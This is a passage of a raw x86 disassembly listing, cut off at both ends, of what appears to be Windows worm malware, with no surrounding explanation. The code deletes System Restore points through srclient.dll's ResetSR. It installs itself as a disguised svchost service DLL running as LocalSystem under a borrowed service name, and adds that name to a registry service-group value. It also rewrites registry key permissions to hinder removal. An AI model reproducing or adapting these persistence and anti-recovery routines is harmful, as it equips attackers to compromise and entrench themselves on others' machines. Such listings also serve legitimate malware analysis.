push 32h ; dwMilliseconds
call Sleep
jmp short loc_9ACCF2
; ---------------------------------------------------------------------------
loc_9ACCEB: ; CODE XREF: sub_9ACABE+D3�j
push esi ; hObject
call CloseHandle
loc_9ACCF2: ; CODE XREF: sub_9ACABE+C2�j
; sub_9ACABE+22B�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ACB3C
loc_9ACD02: ; CODE XREF: sub_9ACABE+78�j
cmp ds:dword_9BA278, ebx
jnz loc_9ACDBE
call sub_9A9580
mov esi, eax
push esi
call sub_9AB3B6
test eax, eax
pop ecx
jz short loc_9ACD2B
push esi
call sub_9AB389
test eax, eax
pop ecx
jnz short loc_9ACD2D
loc_9ACD2B: ; CODE XREF: sub_9ACABE+260�j
xor esi, esi
loc_9ACD2D: ; CODE XREF: sub_9ACABE+26B�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe short loc_9ACDB2
loc_9ACD37: ; CODE XREF: sub_9ACABE+2B9�j
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_9AB389
test eax, eax
pop ecx
jz short loc_9ACD6D
mov eax, [ebp+var_4]
lea ecx, [eax+eax*2]
mov ecx, dword ptr [ebp+ecx*4+in.S_un]
cmp ecx, esi
jz short loc_9ACD60
cmp esi, ebx
jnz short loc_9ACD70
loc_9ACD60: ; CODE XREF: sub_9ACABE+29C�j
push ebx
push ecx
call sub_9AECA4
test eax, eax
pop ecx
pop ecx
jnz short loc_9ACD7B
loc_9ACD6D: ; CODE XREF: sub_9ACABE+28B�j
mov eax, [ebp+var_4]
loc_9ACD70: ; CODE XREF: sub_9ACABE+2A0�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb short loc_9ACD37
jmp short loc_9ACDB2
; ---------------------------------------------------------------------------
loc_9ACD7B: ; CODE XREF: sub_9ACABE+2AD�j
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov edx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
mov eax, ds:dword_9BA2A4
mov [ebp+Dst], ecx
mov [ebp+var_1C], edx
mov ds:dword_9BA27C, eax
mov ds:dword_9BA278, ecx
loc_9ACDB2: ; CODE XREF: sub_9ACABE+277�j
; sub_9ACABE+2BB�j
cmp ds:dword_9BA278, ebx
jz loc_9ACE4C
loc_9ACDBE: ; CODE XREF: sub_9ACABE+24A�j
push ebx
push ds:dword_9BA27C
lea eax, [ebp+Name]
push ds:dword_9BA278
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call CreateEventA
mov esi, eax
cmp esi, ebx
jz short loc_9ACE4C
call GetLastError
cmp eax, 0B7h
jz short loc_9ACE45
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [eax], esi
mov ecx, ds:dword_9BA278
mov [eax+4], ecx
mov ecx, ds:dword_9BA27C
mov [eax+10h], ecx
lea ecx, [ebp+var_4C]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AC6FE ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
push 32h ; dwMilliseconds
call Sleep
jmp short loc_9ACE4C
; ---------------------------------------------------------------------------
loc_9ACE45: ; CODE XREF: sub_9ACABE+343�j
push esi ; hObject
call CloseHandle
loc_9ACE4C: ; CODE XREF: sub_9ACABE+2FA�j
; sub_9ACABE+336�j ...
mov [ebp+var_14], 1
loc_9ACE53: ; CODE XREF: sub_9ACABE+506�j
push 4E20h ; dwMilliseconds
call Sleep
lea eax, [ebp+var_1850]
push 100h ; int
push eax ; Dst
call sub_9AB41B
cmp eax, [ebp+var_C]
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9ACE7C
mov [ebp+var_14], ebx
loc_9ACE7C: ; CODE XREF: sub_9ACABE+3B9�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9ACFC1
loc_9ACE8A: ; CODE XREF: sub_9ACABE+4FD�j
cmp [ebp+var_24], ebx
mov [ebp+var_8], ebx
jbe short loc_9ACED3
lea ecx, [eax+eax*2]
shl ecx, 2
mov esi, dword ptr [ebp+ecx+in.S_un]
lea edx, [ebp+var_184C]
loc_9ACEA5: ; CODE XREF: sub_9ACABE+413�j
cmp [edx-4], esi
jnz short loc_9ACEC5
mov edi, [edx]
cmp edi, [ebp+ecx+var_C4C]
jnz short loc_9ACEC5
mov edi, [edx+4]
cmp edi, [ebp+ecx+var_C48]
jz loc_9ACFB4
loc_9ACEC5: ; CODE XREF: sub_9ACABE+3EA�j
; sub_9ACABE+3F5�j
mov edi, [ebp+var_24]
inc [ebp+var_8]
add edx, 0Ch
cmp [ebp+var_8], edi
jb short loc_9ACEA5
loc_9ACED3: ; CODE XREF: sub_9ACABE+3D2�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
mov esi, OpenEventA
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov edi, eax
cmp edi, ebx
jz short loc_9ACF28
push edi ; hEvent
call SetEvent
push edi ; hObject
call CloseHandle
loc_9ACF28: ; CODE XREF: sub_9ACABE+45A�j
mov eax, [ebp+var_4]
mov edx, [ebp+Dst]
lea ecx, [eax+eax*2]
shl ecx, 2
cmp edx, dword ptr [ebp+ecx+in.S_un]
jnz short loc_9ACFB1
mov edx, [ebp+var_1C]
cmp edx, [ebp+ecx+var_C4C]
jnz short loc_9ACFB1
mov edx, [ebp+var_18]
cmp edx, [ebp+ecx+var_C48]
jnz short loc_9ACFB1
push 0Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
push ebx
push ds:dword_9BA27C
lea eax, [ebp+Name]
push ds:dword_9BA278
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 24h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov esi, eax
cmp esi, ebx
jz short loc_9ACFA2
push esi ; hEvent
call SetEvent
push esi ; hObject
call CloseHandle
loc_9ACFA2: ; CODE XREF: sub_9ACABE+4D4�j
push ebx ; Value
push offset dword_9BA278 ; Target
call InterlockedExchange
mov eax, [ebp+var_4]
loc_9ACFB1: ; CODE XREF: sub_9ACABE+47D�j
; sub_9ACABE+489�j ...
mov [ebp+var_14], ebx
loc_9ACFB4: ; CODE XREF: sub_9ACABE+401�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ACE8A
loc_9ACFC1: ; CODE XREF: sub_9ACABE+3C6�j
cmp [ebp+var_14], ebx
jnz loc_9ACE53
jmp loc_9ACAEB
sub_9ACABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACFCF proc near ; CODE XREF: StartAddress+1D9�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, CreateThread
push edi
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor ebx, ebx
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9ACA50 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9ACABE ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_9ACFCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD00D proc near ; CODE XREF: sub_9AD71D:loc_9AD904�p
var_20 = dword ptr -20h
hLibModule = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_9A4678
call __SEH_prolog
push offset LibFileName ; "srclient.dll"
call LoadLibraryA
mov [ebp+hLibModule], eax
and [ebp+ms_exc.disabled], 0
test eax, eax
jz short loc_9AD04F
push offset aResetsr ; "ResetSR"
push eax ; hModule
call GetProcAddress
mov [ebp+var_20], eax
test eax, eax
jz short loc_9AD04F
push 0
call eax
jmp short loc_9AD04F
; ---------------------------------------------------------------------------
loc_9AD048: ; DATA XREF: .text:stru_9A4678�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD04C: ; DATA XREF: .text:stru_9A4678�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AD04F: ; CODE XREF: sub_9AD00D+20�j
; sub_9AD00D+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hLibModule] ; hLibModule
call FreeLibrary
call __SEH_epilog
retn
sub_9AD00D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD062 proc near ; CODE XREF: sub_9AD71D+3C�p
ServiceConfig = _QUERY_SERVICE_CONFIGW ptr -2050h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
ResumeHandle = dword ptr -3Ch
var_38 = dword ptr -38h
pcbBytesNeeded = dword ptr -34h
hSCObject = dword ptr -30h
ServicesReturned= dword ptr -2Ch
var_28 = dword ptr -28h
dwBytes = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9A4688
push offset unknown_libname_1 ; Microsoft VisualC 2-9/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 2038h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_40], ebx
mov [ebp+var_4], ebx
push 20005h ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
call OpenSCManagerW
mov [ebp+hSCObject], eax
cmp eax, ebx
jz loc_9AD23C
mov [ebp+dwBytes], ebx
mov [ebp+ServicesReturned], ebx
mov [ebp+ResumeHandle], ebx
mov [ebp+hMem], ebx
mov esi, GlobalAlloc
loc_9AD0C3: ; CODE XREF: sub_9AD062+B3�j
lea eax, [ebp+ResumeHandle]
push eax ; lpResumeHandle
lea eax, [ebp+ServicesReturned]
push eax ; lpServicesReturned
lea eax, [ebp+dwBytes]
push eax ; pcbBytesNeeded
push [ebp+dwBytes] ; cbBufSize
push [ebp+hMem] ; lpServices
push 3 ; dwServiceState
push 30h ; dwServiceType
push [ebp+hSCObject] ; hSCManager
call EnumServicesStatusW
mov [ebp+var_44], eax
cmp eax, ebx
jnz short loc_9AD117
call GetLastError
cmp eax, 0EAh
jnz short loc_9AD117
cmp [ebp+hMem], ebx
jz short loc_9AD104
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AD104: ; CODE XREF: sub_9AD062+97�j
push [ebp+dwBytes] ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AD117
mov [ebp+ResumeHandle], ebx
jmp short loc_9AD0C3
; ---------------------------------------------------------------------------
loc_9AD117: ; CODE XREF: sub_9AD062+85�j
; sub_9AD062+92�j ...
cmp [ebp+var_44], ebx
jz loc_9AD22A
cmp [ebp+hMem], ebx
jz loc_9AD22A
mov eax, [ebp+ServicesReturned]
shl eax, 2
push eax ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov edi, eax
mov [ebp+var_50], edi
mov [ebp+var_20], ebx
or [ebp+var_38], 0FFFFFFFFh
xor esi, esi
loc_9AD142: ; CODE XREF: sub_9AD062+187�j
mov [ebp+var_28], esi
cmp esi, [ebp+ServicesReturned]
jnb loc_9AD1EE
push 20005h ; dwDesiredAccess
lea eax, [esi+esi*8]
mov ecx, [ebp+hMem]
push dword ptr [ecx+eax*4] ; lpServiceName
push [ebp+hSCObject] ; hSCManager
call OpenServiceW
mov ebx, eax
mov [ebp+var_48], ebx
test ebx, ebx
jz short loc_9AD1E6
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+ServiceConfig]
push eax ; lpServiceConfig
push ebx ; hService
call QueryServiceConfigW
test eax, eax
jz short loc_9AD1DF
cmp [ebp+ServiceConfig.dwStartType], 2
jnz short loc_9AD1DF
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+ServiceConfig]
push eax ; lpBuffer
push 1 ; dwInfoLevel
push ebx ; hService
call QueryServiceConfig2W
test eax, eax
jz short loc_9AD1DF
cmp [ebp+pcbBytesNeeded], 0
jz short loc_9AD1DF
lea eax, [ebp+ServiceConfig]
mov [ebp+var_4C], eax
mov eax, [ebp+ServiceConfig.dwServiceType]
test eax, eax
jz short loc_9AD1DF
cmp word ptr [eax], 0
jz short loc_9AD1DF
push eax ; Str
call _wcsdup
pop ecx
mov ecx, [ebp+var_20]
mov [edi+ecx*4], eax
inc [ebp+var_20]
loc_9AD1DF: ; CODE XREF: sub_9AD062+125�j
; sub_9AD062+12E�j ...
push ebx ; hSCObject
call CloseServiceHandle
loc_9AD1E6: ; CODE XREF: sub_9AD062+10A�j
inc esi
xor ebx, ebx
jmp loc_9AD142
; ---------------------------------------------------------------------------
loc_9AD1EE: ; CODE XREF: sub_9AD062+E6�j
cmp [ebp+var_20], ebx
jz short loc_9AD207
call rand
xor edx, edx
div [ebp+var_20]
mov [ebp+var_38], edx
mov eax, [edi+edx*4]
mov [ebp+var_40], eax
loc_9AD207: ; CODE XREF: sub_9AD062+18F�j
xor esi, esi
loc_9AD209: ; CODE XREF: sub_9AD062+1BF�j
mov [ebp+var_28], esi
cmp esi, [ebp+var_20]
jnb short loc_9AD223
cmp [ebp+var_38], esi
jz short loc_9AD220
push dword ptr [edi+esi*4] ; Memory
call free
pop ecx
loc_9AD220: ; CODE XREF: sub_9AD062+1B2�j
inc esi
jmp short loc_9AD209
; ---------------------------------------------------------------------------
loc_9AD223: ; CODE XREF: sub_9AD062+1AD�j
push edi ; hMem
call GlobalFree
loc_9AD22A: ; CODE XREF: sub_9AD062+B8�j
; sub_9AD062+C1�j
push [ebp+hMem] ; hMem
call GlobalFree
push [ebp+hSCObject] ; hSCObject
call CloseServiceHandle
loc_9AD23C: ; CODE XREF: sub_9AD062+49�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_9AD24F
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
loc_9AD24F: ; CODE XREF: sub_9AD062+1DE�j
mov eax, [ebp+var_40]
cmp eax, ebx
jnz short loc_9AD262
push offset Str ; Str
call _wcsdup
pop ecx
loc_9AD262: ; CODE XREF: sub_9AD062+1F2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_9AD062 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD271(HKEY hKey)
sub_9AD271 proc near ; CODE XREF: sub_9AD363+80�p
pSecurityDescriptor= byte ptr -48h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
pSid = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
hKey = dword ptr 8
push 38h
push offset stru_9A4698
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 12h ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
mov esi, eax
add esi, 10h
mov [ebp+var_28], esi
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_20], edi
cmp edi, ebx
jz short loc_9AD32B
push 2 ; dwAclRevision
push esi ; nAclLength
push edi ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push 20019h ; AccessMask
push 2 ; dwAceRevision
push edi ; pAcl
call AddAccessAllowedAce
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
push ebx ; bDaclDefaulted
push edi ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+hKey] ; hKey
call RegSetKeySecurity
mov [ebp+var_2C], eax
xor ecx, ecx
cmp eax, ebx
setz cl
mov [ebp+var_24], ecx
loc_9AD32B: ; CODE XREF: sub_9AD271+67�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AD341
; ---------------------------------------------------------------------------
loc_9AD331: ; DATA XREF: .text:stru_9A4698�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD335: ; DATA XREF: .text:stru_9A4698�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
mov edi, [ebp+var_20]
loc_9AD341: ; CODE XREF: sub_9AD271+BE�j
cmp edi, ebx
jz short loc_9AD34C
push edi ; hMem
call GlobalFree
loc_9AD34C: ; CODE XREF: sub_9AD271+D2�j
cmp [ebp+pSid], ebx
jz short loc_9AD35A
push [ebp+pSid] ; pSid
call FreeSid
loc_9AD35A: ; CODE XREF: sub_9AD271+DE�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AD271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD363(HKEY hKey)
sub_9AD363 proc near ; CODE XREF: sub_9AD363+49�p
; sub_9AD50E+1E8�p
Name = word ptr -214h
phkResult = dword ptr -0Ch
cchName = dword ptr -8
dwIndex = dword ptr -4
hKey = dword ptr 8
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
mov edi, RegEnumKeyExW
xor esi, esi
push esi
push esi
push esi
push esi
lea eax, [ebp+cchName]
push eax
lea eax, [ebp+Name]
push eax
mov [ebp+dwIndex], esi
push esi
jmp short loc_9AD3D0
; ---------------------------------------------------------------------------
loc_9AD38B: ; CODE XREF: sub_9AD363+7B�j
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push esi ; ulOptions
lea eax, [ebp+Name]
push eax ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExW
test eax, eax
jnz short loc_9AD3BB
push [ebp+phkResult] ; hKey
call sub_9AD363
pop ecx
push [ebp+phkResult] ; hKey
call RegCloseKey
loc_9AD3BB: ; CODE XREF: sub_9AD363+44�j
inc [ebp+dwIndex]
push esi ; lpftLastWriteTime
push esi ; lpcchClass
push esi ; lpClass
push esi ; lpReserved
lea eax, [ebp+cchName]
push eax ; lpcchName
lea eax, [ebp+Name]
push eax ; lpName
push [ebp+dwIndex] ; dwIndex
loc_9AD3D0: ; CODE XREF: sub_9AD363+26�j
push [ebp+hKey] ; hKey
mov [ebp+cchName], 104h
call edi ; RegEnumKeyExW
test eax, eax
jz short loc_9AD38B
push [ebp+hKey] ; hKey
call sub_9AD271
pop ecx
pop edi
pop esi
leave
retn
sub_9AD363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD3ED(wchar_t *Src, LPCWSTR lpValueName)
sub_9AD3ED proc near ; CODE XREF: sub_9AD50E+1D2�p
SubKey = word ptr -88h
Type = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Data = byte ptr -9
hKey = dword ptr -8
cbData = dword ptr -4
Src = dword ptr 8
lpValueName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1Ah
pop ecx
mov esi, offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
lea edi, [ebp+SubKey]
rep movsd
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
xor ebx, ebx
push ebx ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000002h ; hKey
mov [ebp+var_10], ebx
movsw
call RegOpenKeyExW
test eax, eax
jnz loc_9AD506
mov esi, RegQueryValueExW
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push ebx ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+cbData], 1
push [ebp+hKey] ; hKey
mov [ebp+Type], 7
call esi ; RegQueryValueExW
cmp eax, 0EAh
jnz loc_9AD4FD
push [ebp+Src] ; Str
mov edi, wcslen
call edi ; wcslen
pop ecx
mov ecx, [ebp+cbData]
lea eax, [ecx+eax*2+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+var_18], eax
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AD4FD
lea eax, [ebp+cbData]
push eax ; lpcbData
push ebx ; lpData
lea eax, [ebp+var_14]
push eax ; lpType
push 0 ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+var_14], 7
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExW
test eax, eax
jnz short loc_9AD4F6
mov esi, [ebp+cbData]
push [ebp+Src] ; Str
shr esi, 1
dec esi
call edi ; wcslen
lea edi, [eax+eax+2]
push edi ; Size
push [ebp+Src] ; Src
add esi, esi
lea eax, [esi+ebx]
push eax ; Dst
call memcpy
push 2 ; Size
add esi, edi
push 0 ; Val
add esi, ebx
push esi ; Dst
call memset
add esp, 1Ch
push [ebp+var_18] ; cbData
push ebx ; lpData
push 7 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExW
test eax, eax
jnz short loc_9AD4F6
mov [ebp+var_10], 1
loc_9AD4F6: ; CODE XREF: sub_9AD3ED+B9�j
; sub_9AD3ED+100�j
push ebx ; hMem
call GlobalFree
loc_9AD4FD: ; CODE XREF: sub_9AD3ED+72�j
; sub_9AD3ED+9B�j
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AD506: ; CODE XREF: sub_9AD3ED+3E�j
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_9AD3ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD50E(int, wchar_t *Src, BYTE *lpData, wchar_t *lpValueName, int)
sub_9AD50E proc near ; CODE XREF: sub_9AD71D+104�p
Source = word ptr -0ACh
var_60 = byte ptr -60h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
phkResult = dword ptr -10h
hMem = dword ptr -0Ch
Data = byte ptr -8
hKey = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
lpData = dword ptr 10h
lpValueName = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0ACh
and [ebp+var_14], 0
push ebx
mov ebx, wcslen
push esi
push edi
push 13h
pop ecx
push [ebp+lpValueName] ; Str
mov esi, offset aSystemrootSyst ; "%SystemRoot%\\system32\\svchost.exe -k "
lea edi, [ebp+Source]
rep movsd
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+4Ch]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
mov [ebp+hMem], esi
jz short loc_9AD5A0
lea eax, [ebp+Source]
push eax ; Source
push esi ; Dest
call wcscpy
push [ebp+lpValueName] ; Source
push esi ; Dest
call wcscat
push 11h
pop ecx
push [ebp+Src] ; Str
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+var_60]
rep movsd
movsw
call ebx ; wcslen
add esp, 14h
lea eax, [eax+eax+46h]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
xor edi, edi
cmp esi, edi
mov [ebp+var_18], esi
jnz short loc_9AD5A7
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AD5A0: ; CODE XREF: sub_9AD50E+40�j
xor eax, eax
jmp loc_9AD718
; ---------------------------------------------------------------------------
loc_9AD5A7: ; CODE XREF: sub_9AD50E+87�j
lea eax, [ebp+var_60]
push eax ; Source
push esi ; Dest
call wcscpy
push [ebp+Src] ; Source
push esi ; Dest
call wcscat
add esp, 10h
push edi ; lpdwDisposition
lea eax, [ebp+hKey]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 0F003Fh ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push esi ; lpSubKey
push 80000002h ; hKey
call RegCreateKeyExW
test eax, eax
jnz loc_9AD705
push [ebp+lpData] ; Str
call ebx ; wcslen
mov esi, RegSetValueExW
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+lpData] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset ValueName ; "DisplayName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aType ; "Type"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 20h
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aStart ; "Start"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 2
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aErrorcontrol ; "ErrorControl"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], edi
call esi ; RegSetValueExW
push [ebp+hMem] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+hMem] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aImagepath ; "ImagePath"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 18h ; cbData
push offset Data ; "LocalSystem"
push 1 ; dwType
push edi ; Reserved
push offset aObjectname ; "ObjectName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push [ebp+arg_10] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_10] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset aDescription ; "Description"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push edi ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 20006h ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push offset SubKey ; "Parameters"
push [ebp+hKey] ; hKey
call RegCreateKeyExW
test eax, eax
jnz short loc_9AD6EA
push [ebp+arg_0] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_0] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aServicedll ; "ServiceDll"
push [ebp+phkResult] ; hKey
call esi ; RegSetValueExW
push [ebp+phkResult] ; hKey
call RegCloseKey
push [ebp+lpValueName] ; lpValueName
push [ebp+Src] ; Src
call sub_9AD3ED
pop ecx
pop ecx
mov [ebp+var_14], eax
loc_9AD6EA: ; CODE XREF: sub_9AD50E+1A6�j
push [ebp+hKey] ; hKey
call RegFlushKey
push [ebp+hKey] ; hKey
call sub_9AD363
pop ecx
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AD705: ; CODE XREF: sub_9AD50E+CD�j
push [ebp+hMem] ; hMem
mov esi, GlobalFree
call esi ; GlobalFree
push [ebp+var_18] ; hMem
call esi ; GlobalFree
mov eax, [ebp+var_14]
loc_9AD718: ; CODE XREF: sub_9AD50E+94�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AD50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
; int __cdecl sub_9AD71D(char *lpMultiByteStr)
